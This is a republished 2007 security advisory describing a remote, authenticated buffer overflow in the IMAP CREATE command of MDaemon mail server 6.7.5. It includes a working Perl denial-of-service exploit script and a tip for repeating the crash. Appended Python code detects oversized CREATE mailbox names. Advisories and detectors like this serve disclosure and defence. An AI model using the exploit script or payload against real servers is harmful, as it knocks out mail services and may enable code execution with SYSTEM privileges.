MDaemon SMTP/POP/IMAP server =>v.6.7.5: IMAP buffer overflow

2007.10.25
Credit: D4rkGr3y
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

-----BEGIN PGP SIGNED MESSAGE-----

########################################################*
# Damage Hacking Group security advisory
# www.dhgroup.org
########################################################*
#Product: MDaemon SMTP/POP/IMAP server =>v.6.7.5
#Authors: Alt-N Technologies [www.mdaemon.com]
#Vulnerability: remote buffer overflow in IMAP service
########################################################*

#Overview#-----------------------------------------------------#

From the help file: "MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services commonplace on UNIX hosts and the Internet to Windows based servers and microcomputers. MDaemon is designed to manage the email needs of any number of individual users and comes complete with a powerful set of integrated tools for managing mail accounts and message formats. MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete with LDAP support, an integrated browser-based email client, content filtering, spam blockers, extensive security features, and more."

#Problem#------------------------------------------------------#

A remote buffer overflow was found in the MDaemon IMAP service. A remote authenticated user can execute arbitrary code on the server with SYSTEM privileges. The "CREATE" command of the IMAP server does not have proper bounds checking, which lets a user shut down the service remotely. Note that a valid user account is required.

A remote authenticated user can create a new mailbox via the IMAP service with a mailbox name longer than 1 KB. As a result, the SMTP/POP/IMAP/LDAP services crash, while WorldClient and WebAdmin keep working normally. For example:

0 CREATE AAAAAAA..[1kb]..AAA

When "0 CREATE AAAAAAA..[1kb]..AAA" is sent, the server creates a mailbox named "AAAAA..[202 bytes]..AAA" and crashes. Sending exactly the same command a second time does not trigger the crash again, because the server considers the mailbox "AAAAA...AAA" already created and refuses to process the command. To get around this, any character within the first 202 characters must be changed (for example, create "BAAAAAA...AA" or "BBBBBBB...BB" instead of "AAAAA...AA").

The vulnerability may be used to execute arbitrary code (the remote user can cause the EAX and EDI registers to be overwritten with arbitrary data). All code runs with SYSTEM privileges if MDaemon is installed as a system service.

#Exploit#------------------------------------------------------#

    #!/usr/bin/perl
    ###############
    #MDaemon SMTP/POP/IMAP server v.6.7.5
    #Remote DoS exploit
    ##Edit this stuff:
    $host = "imap_server";
    $port = "143";
    $login = "login";
    $pass = "pass";
    #Attention! If exploit doesn't
    #work, change this:
    $data = "A";
    ###############
    use IO::Socket;
    $num = "1000";
    $buf .= $data x $num;
    print "Connecting... ";
    $socket = IO::Socket::INET->new(PeerAddr => $host,
                                    PeerPort => $port,
                                    Proto    => "tcp",
                                    Type     => SOCK_STREAM)
        or die "Couldn't connect.\n";
    print " OK\n";
    print "Attacking... ";
    print $socket "DHGroup Login $login $pass\n";
    sleep(1);
    print $socket "DHGroup CREATE $buf\n";
    sleep(1);
    print " OK\n";
    print "Exiting... \n";
    close($socket);
    ##//www.dhgroup.org//
    #EOF

PS. thx to PIG_KILLER [www.securitylab.ru]

Best regards
www.dhgroup.org
D4rkGr3y
icq 540981

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>
-----END PGP SIGNATURE-----
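The flaw above is purely length-driven: changing bytes in the name bypasses the server's duplicate-mailbox check but not the overflow, so a detector on an IMAP proxy or IDS should key on the size of the CREATE argument, not its content. The following is an added example (not part of the advisory or of MDaemon) that parses client command lines, recovers the mailbox-name length through IMAP quoted strings and literal announcements, and flags oversized CREATE requests; the 256-byte ceiling and the session lines are assumed/constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Assumed local policy: the advisory reports a crash above 1 KB with only
# ~202 bytes of the name surviving, so 256 bytes leaves room for legitimate
# folder names while catching the oversized CREATE.
MAX_MAILBOX_NAME = 256

# Client line layout: "<tag> <COMMAND> [arguments]", e.g. "a2 CREATE Archive/2007"
IMAP_CMD = re.compile(r"^(?P<tag>\S+)\s+(?P<cmd>[A-Za-z]+)(?:\s+(?P<args>.*))?$")


@dataclass
class Finding:
    tag: str
    command: str
    name_len: int
    reason: str


def mailbox_name_length(args: str) -> int:
    """Byte length of the mailbox-name argument. Handles an RFC 3501 literal
    announcement like {1000} (the client promises 1000 bytes follow) and a
    quoted string, otherwise the bare atom."""
    args = args.strip()
    literal = re.fullmatch(r"\{(\d+)\+?\}", args)
    if literal:
        return int(literal.group(1))
    if len(args) >= 2 and args[0] == '"' and args[-1] == '"':
        return len(args[1:-1].replace('\\"', '"').replace("\\\\", "\\"))
    return len(args)


def check_imap_line(line: str) -> Optional[Finding]:
    """Return a Finding when the client line is a CREATE with an oversized name."""
    m = IMAP_CMD.match(line.rstrip("\r\n"))
    if not m or m.group("cmd").upper() != "CREATE" or not m.group("args"):
        return None
    n = mailbox_name_length(m.group("args"))
    if n > MAX_MAILBOX_NAME:
        return Finding(m.group("tag"), "CREATE", n,
                       f"mailbox name {n} bytes exceeds {MAX_MAILBOX_NAME}")
    return None


def scan_session(lines: List[str]) -> List[Finding]:
    """Findings for every offending client line in a captured session."""
    return [f for f in map(check_imap_line, lines) if f is not None]


# Constructed sample of client lines (not real traffic).
SAMPLE_SESSION = [
    "a1 LOGIN user pass",
    "a2 CREATE Archive/2007",
    'a3 CREATE "Sent Items"',
    "a4 CREATE " + "A" * 1000,         # the oversized name from the advisory
    "a5 CREATE " + "B" + "A" * 999,    # same length, first byte changed
    "a6 CREATE {1000}",                # same size announced as a literal
]
```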



Copyright 2020, cxsecurity.com
